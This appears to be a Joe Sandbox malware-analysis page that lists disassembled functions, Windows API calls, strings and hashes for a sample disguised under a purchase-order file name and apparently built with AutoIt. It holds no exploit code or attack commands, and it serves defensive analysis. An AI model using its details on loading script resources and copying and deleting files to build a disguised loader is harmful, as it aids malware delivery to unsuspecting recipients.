Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 2d397b77c96578f51bd178e611aee99bb28d07d24893a6e8005fdf1bb2615640
Instruction ID: 8d0e3f8703e641f7dc44be798b40e30172c8f454d63aad706eb8f519579aa2d9
Opcode Fuzzy Hash: 2d397b77c96578f51bd178e611aee99bb28d07d24893a6e8005fdf1bb2615640
Instruction Fuzzy Hash: CE61A4B1C0A384DBCF15CF6498C01EA7FB46F29300B1989DAD8495F34BC628C649CB6E

Function 0040406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0040449E,?,?,00000000,00000001), ref: 0040407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0040449E,?,?,00000000,00000001), ref: 00404092
LoadResource.KERNEL32(?,00000000,?,?,0040449E,?,?,00000000,00000001,?,?,?,?,?,?,004041FB), ref: 00474F1A
SizeofResource.KERNEL32(?,00000000,?,?,0040449E,?,?,00000000,00000001,?,?,?,?,?,?,004041FB), ref: 00474F2F
LockResource.KERNEL32(0040449E,?,?,0040449E,?,?,00000000,00000001,?,?,?,?,?,?,004041FB,00000000), ref: 00474F42

Strings

SCRIPT, xrefs: 00404088

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 598b74e3e7d0966417a201d7e2a7d5b6959d3e6f169732877d01589aef66d113
Instruction ID: f77eb1c464526354bceaabec8d79980ec563cae601d2e2506ae7cf38a943322b
Opcode Fuzzy Hash: 598b74e3e7d0966417a201d7e2a7d5b6959d3e6f169732877d01589aef66d113
Instruction Fuzzy Hash: 27112E71600701AFE7219B65EC48F677BB9EBC5B51F1045BDF612A62D0DB75DC008A24

Function 00446CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00472F49), ref: 00446CB9
FindFirstFileW.KERNEL32(?,?), ref: 00446CCA
FindClose.KERNEL32(00000000), ref: 00446CDA

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 89e679d9f2f1704275dd35e5d452af09cf7d74eba14b971797ddaeb24cd62071
Instruction ID: 78d71e6d327d38dcb7c1aa5d0e34089853346cf5f0f87180683a2751a0062266
Opcode Fuzzy Hash: 89e679d9f2f1704275dd35e5d452af09cf7d74eba14b971797ddaeb24cd62071
Instruction Fuzzy Hash: 2AE0D831C1151057A2146738EC4D8EE376CDE06339F100B1AF871C12D0EB74D90046DF

Function 00413200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON

Download Yara Rule

Strings

L, xrefs: 0047933E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: BuffCharUpper
String ID: L
API String ID: 3964851224-249544069
Opcode ID: 310886f7a74512a53041a1297588b07bc8685f270046a95c51a28cc9f3919146
Instruction ID: 7c9fdd5cd437a79d1c3c0ac98f7823f3fe2e1a6fd868af1480b8a04681f0d1cc
Opcode Fuzzy Hash: 310886f7a74512a53041a1297588b07bc8685f270046a95c51a28cc9f3919146
Instruction Fuzzy Hash: F8927E706083419FD714DF19C480BABB7E1BF84308F14885EE99A8B352D779ED85CB5A

Function 0040E3E3 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e830bf555112b2ad5d4f280f039b4480d517733cda6932f23b6fc571beb1657
Instruction ID: 8c316f122af884e65fd23efdceb602b2cf0fe7a3b43f3523b9e3e47a843a4e61
Opcode Fuzzy Hash: 8e830bf555112b2ad5d4f280f039b4480d517733cda6932f23b6fc571beb1657
Instruction Fuzzy Hash: F912D170A04205DFDB24DF56C480AAAB7B0FF14304F54C87BD949AB391E339AD96CB99

Function 0040E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040E959
timeGetTime.WINMM ref: 0040EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040ED2E
TranslateMessage.USER32(?), ref: 0040ED3F
DispatchMessageW.USER32(?), ref: 0040ED4A
LockWindowUpdate.USER32(00000000), ref: 0040ED79
DestroyWindow.USER32 ref: 0040ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040ED9F
Sleep.KERNEL32(0000000A), ref: 00475270
TranslateMessage.USER32(?), ref: 004759F7
DispatchMessageW.USER32(?), ref: 00475A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00475A19

Strings

@GUI_CTRLID, xrefs: 00475314
@GUI_WINHANDLE, xrefs: 00475360
@GUI_CTRLHANDLE, xrefs: 004753AC
@TRAY_ID, xrefs: 004754C9

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: fd1537bac21e21918f44387b280ddf5fa984ab1e9dbd8ad4a2720d7b6d06c9d0
Instruction ID: 30b0b18e468af62d7d02d398255fc33e35c629728c4d1f4c1ebb194875fc3dde
Opcode Fuzzy Hash: fd1537bac21e21918f44387b280ddf5fa984ab1e9dbd8ad4a2720d7b6d06c9d0
Instruction Fuzzy Hash: AE62A370508340DFE724DF25C885BAA77E4BF44304F04497FE94A9B2D2DBB9A849CB5A

Function 00435C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00435EC3
___createFile.LIBCMT ref: 00435F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00435F2D
__dosmaperr.LIBCMT ref: 00435F34
GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00435F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00435F6A
__dosmaperr.LIBCMT ref: 00435F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00435F7C
__set_osfhnd.LIBCMT ref: 00435FAC
__lseeki64_nolock.LIBCMT ref: 00436016
__close_nolock.LIBCMT ref: 0043603C
__chsize_nolock.LIBCMT ref: 0043606C
__lseeki64_nolock.LIBCMT ref: 0043607E
__lseeki64_nolock.LIBCMT ref: 00436176
__lseeki64_nolock.LIBCMT ref: 0043618B
__close_nolock.LIBCMT ref: 004361EB

Part of subcall function 0042EA9C: CloseHandle.KERNEL32(00000000,004AEEF4,00000000,?,00436041,004AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0042EAEC
Part of subcall function 0042EA9C: GetLastError.KERNEL32(?,00436041,004AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0042EAF6
Part of subcall function 0042EA9C: __free_osfhnd.LIBCMT ref: 0042EB03
Part of subcall function 0042EA9C: __dosmaperr.LIBCMT ref: 0042EB25

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

__lseeki64_nolock.LIBCMT ref: 0043620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00436342
___createFile.LIBCMT ref: 00436361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0043636E
__dosmaperr.LIBCMT ref: 00436375
__free_osfhnd.LIBCMT ref: 00436395
__invoke_watson.LIBCMT ref: 004363C3
__wsopen_helper.LIBCMT ref: 004363DD

Strings

@, xrefs: 00435F98

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: 8c7789bed706ede18dd530b1e3ad8405d4c3b2db8187d7ab4351d5d6ff389688
Instruction ID: 258e66036f6fd46d17c8d5113c19e8d7647eaa250339654dbaeb5c90e1d5d4d5
Opcode Fuzzy Hash: 8c7789bed706ede18dd530b1e3ad8405d4c3b2db8187d7ab4351d5d6ff389688
Instruction Fuzzy Hash: 11224871A00506ABEF299F68DC46BAF7B71EB08314F25926BE9119B3D1C33D8D40C759

Function 0044FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 0044FA96
_wcschr.LIBCMT ref: 0044FAA4
_wcscpy.LIBCMT ref: 0044FABB
_wcscat.LIBCMT ref: 0044FACA
_wcscat.LIBCMT ref: 0044FAE8
_wcscpy.LIBCMT ref: 0044FB09
__wsplitpath.LIBCMT ref: 0044FBE6
_wcscpy.LIBCMT ref: 0044FC0B
_wcscpy.LIBCMT ref: 0044FC1D
_wcscpy.LIBCMT ref: 0044FC32
_wcscat.LIBCMT ref: 0044FC47
_wcscat.LIBCMT ref: 0044FC59
_wcscat.LIBCMT ref: 0044FC6E

Part of subcall function 0044BFA4: _wcscmp.LIBCMT ref: 0044C03E
Part of subcall function 0044BFA4: __wsplitpath.LIBCMT ref: 0044C083
Part of subcall function 0044BFA4: _wcscpy.LIBCMT ref: 0044C096
Part of subcall function 0044BFA4: _wcscat.LIBCMT ref: 0044C0A9
Part of subcall function 0044BFA4: __wsplitpath.LIBCMT ref: 0044C0CE
Part of subcall function 0044BFA4: _wcscat.LIBCMT ref: 0044C0E4
Part of subcall function 0044BFA4: _wcscat.LIBCMT ref: 0044C0F7

Strings

t2K, xrefs: 0044FC97
>>>AUTOIT SCRIPT<<<, xrefs: 0044FA61

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<$t2K
API String ID: 2955681530-1835454193
Opcode ID: 397c2a9de392346911fd9c790da9d7e7ae7aadc563be971c949fde63b22b24f3
Instruction ID: 503cd1224aee480db27c81d30548323e2f4b0e484ad6717af54db5903cf95967
Opcode Fuzzy Hash: 397c2a9de392346911fd9c790da9d7e7ae7aadc563be971c949fde63b22b24f3
Instruction Fuzzy Hash: 03919471604205AFDB10EF55D891E9BB3E8BF44314F00486FF98997292DB38F948CB9A

Function 00AD8550 Relevance: 21.5, APIs: 14, Instructions: 544COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00AD7FD4
FreeSid.ADVAPI32(?), ref: 00AD8579

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ErrorFreeLast
String ID:
API String ID: 1762890227-0
Opcode ID: 5c9e55e231548538975b68ba1f64b9038a692d0e8a87e625926cf8b0aacd1db5
Instruction ID: 0e9034be3cb0448e83f567fd1142ab0ddb002e5cdf1c1381d411d58fb8264b8b
Opcode Fuzzy Hash: 5c9e55e231548538975b68ba1f64b9038a692d0e8a87e625926cf8b0aacd1db5
Instruction Fuzzy Hash: CDF10B6090C340AECB3A57685C09B7D3B756B75760F5D068BF4A7C63E2EE6C8C09D226

Function 00403F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403F86
RegisterClassExW.USER32(00000030), ref: 00403FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00403FC1
InitCommonControlsEx.COMCTL32(?), ref: 00403FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00403FEE
LoadIconW.USER32(000000A9), ref: 00404004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00404013

Strings

AutoIt v3 GUI, xrefs: 00403FA2
TaskbarCreated, xrefs: 00403FB6
0, xrefs: 00403F68
+, xrefs: 00403F6F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 8cbb75d3f7e5a3698af6f0d0412bdfe020db27ea78879be70f390616e49b9fa0
Instruction ID: 39fee9d6861713e640d73bccf1ba937979938cd6d36e5674434e574d06268e08
Opcode Fuzzy Hash: 8cbb75d3f7e5a3698af6f0d0412bdfe020db27ea78879be70f390616e49b9fa0
Instruction Fuzzy Hash: F12108B5D01308AFDB40EFA4EC89BCDBBB4FB09704F00452AF511A62A0D7B44544CF99

Function 0044BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0044BDB4: __time64.LIBCMT ref: 0044BDBE

Part of subcall function 00404517: _fseek.LIBCMT ref: 0040452F

__wsplitpath.LIBCMT ref: 0044C083

Part of subcall function 00421DFC: __wsplitpath_helper.LIBCMT ref: 00421E3C

_wcscpy.LIBCMT ref: 0044C096
_wcscat.LIBCMT ref: 0044C0A9
__wsplitpath.LIBCMT ref: 0044C0CE
_wcscat.LIBCMT ref: 0044C0E4
_wcscat.LIBCMT ref: 0044C0F7
_wcscmp.LIBCMT ref: 0044C03E

Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C65D
Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0044C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0044C338
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0044C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0044C35F
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0044C371

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: 2d3f61bed0371d27bb488f48ba0a5d5d60d1fa0b6d7278b81cc3c75f8688b2c3
Instruction ID: 97f54707bf9dff136f04eda468cc35fa1287b7f90913d34c6e51530f47754c09
Opcode Fuzzy Hash: 2d3f61bed0371d27bb488f48ba0a5d5d60d1fa0b6d7278b81cc3c75f8688b2c3
Instruction Fuzzy Hash: ABC12CB1E01129ABDF21DF96CC81EDEB7BDAF48304F0440ABF609E6151DB749A448F69

Function 00ABCE90 Relevance: 16.2, APIs: 10, Instructions: 1207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa85c9b33f6ca759e22a6aa7780fb3d0ada8ffa18ee721c04cb0fee129f5587c
Instruction ID: cfd4e6a9479547da487ab775ed4688af1c0c336edc4903e0c4984182f7675734
Opcode Fuzzy Hash: fa85c9b33f6ca759e22a6aa7780fb3d0ada8ffa18ee721c04cb0fee129f5587c
Instruction Fuzzy Hash: 75A28F7150D3808FC735CB18C854BEABBE9AFD5328F094A5DE49897293E335A904CB97

Function 00403742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004037B3
KillTimer.USER32(?,00000001), ref: 004037DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00403800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040380B
CreatePopupMenu.USER32 ref: 0040381F
PostQuitMessage.USER32(00000000), ref: 0040382E

Strings

TaskbarCreated, xrefs: 00403806

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 4ae2860ea2cf3a4424b1df9f2717f400eabec22553c1a915877c3a59055104d7
Instruction ID: 9818f98b5f829a4c8db2a31be09732de94f6fcc06798172ad55270a3605b7810
Opcode Fuzzy Hash: 4ae2860ea2cf3a4424b1df9f2717f400eabec22553c1a915877c3a59055104d7
Instruction Fuzzy Hash: D44115F5500149ABDB145F699C4AFBA3A59FB41302F00853BF902B32E2DB7C9D51972E

Function 00403E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403E79
LoadCursorW.USER32(00000000,00007F00), ref: 00403E88
LoadIconW.USER32(00000063), ref: 00403E9E
LoadIconW.USER32(000000A4), ref: 00403EB0
LoadIconW.USER32(000000A2), ref: 00403EC2

Part of subcall function 00404024: LoadImageW.USER32(00400000,00000063,00000001,00000010,00000010,00000000), ref: 00404048

RegisterClassExW.USER32(?), ref: 00403F30

Part of subcall function 00403F53: GetSysColorBrush.USER32(0000000F), ref: 00403F86
Part of subcall function 00403F53: RegisterClassExW.USER32(00000030), ref: 00403FB0
Part of subcall function 00403F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00403FC1
Part of subcall function 00403F53: InitCommonControlsEx.COMCTL32(?), ref: 00403FDE
Part of subcall function 00403F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00403FEE
Part of subcall function 00403F53: LoadIconW.USER32(000000A9), ref: 00404004
Part of subcall function 00403F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00404013

Strings

0, xrefs: 00403F02
AutoIt v3, xrefs: 00403F1F
#, xrefs: 00403F09

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

